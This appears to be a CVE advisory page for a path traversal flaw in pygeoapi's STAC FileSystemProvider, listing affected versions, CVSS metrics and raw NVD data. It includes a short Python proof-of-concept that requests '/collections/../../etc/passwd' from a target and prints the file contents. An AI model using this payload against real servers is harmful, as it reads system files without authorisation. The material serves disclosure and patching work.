Security Vulnerability Report
中文
CVE-2026-42351 CVSS 7.5 HIGH

CVE-2026-42351

Published: 2026-05-08 23:16:38
Last Modified: 2026-05-08 23:16:38
Source: [email protected]

Description

pygeoapi is a Python server implementation of the OGC API suite of standards. From version 0.23.0 to before version 0.23.3, a raw string path concatenation vulnerability in pygeoapi's STAC FileSystemProvider plugin can allow for requests to STAC collection based collections to expose directories without authentication. The issue manifests when pygeoapi is deployed without a proxy or web front end that would normalize URLs with .. values, along with a resource of type stac-collection defined in configuration. This issue has been patched in version 0.23.3.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

pygeoapi 0.23.0
pygeoapi 0.23.1
pygeoapi 0.23.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2026-42351 - Path Traversal in pygeoapi import requests def check_poc(target_url): # Attempt to access the parent directory using path traversal # The vulnerability occurs in the STAC FileSystemProvider traversal_payload = "/collections/../../etc/passwd" full_url = f"{target_url}{traversal_payload}" try: response = requests.get(full_url, timeout=10) if response.status_code == 200 and "root:" in response.text: print(f"[+] Vulnerability confirmed at {full_url}") print(f"[+] Response content:\n{response.text[:200]}") else: print(f"[-] Target does not appear vulnerable or file not found.") except Exception as e: print(f"[!] Error connecting to target: {e}") if __name__ == "__main__": target = "http://localhost:5000" # Replace with actual target check_poc(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-42351", "sourceIdentifier": "[email protected]", "published": "2026-05-08T23:16:38.170", "lastModified": "2026-05-08T23:16:38.170", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "pygeoapi is a Python server implementation of the OGC API suite of standards. From version 0.23.0 to before version 0.23.3, a raw string path concatenation vulnerability in pygeoapi's STAC FileSystemProvider plugin can allow for requests to STAC collection based collections to expose directories without authentication. The issue manifests when pygeoapi is deployed without a proxy or web front end that would normalize URLs with .. values, along with a resource of type stac-collection defined in configuration. This issue has been patched in version 0.23.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://github.com/geopython/pygeoapi/commit/bf25b8695edbdd5476eeffc102b633d1d3e45f52", "source": "[email protected]"}, {"url": "https://github.com/geopython/pygeoapi/releases/tag/0.23.3", "source": "[email protected]"}, {"url": "https://github.com/geopython/pygeoapi/security/advisories/GHSA-f6pr-83pg-ghh6", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.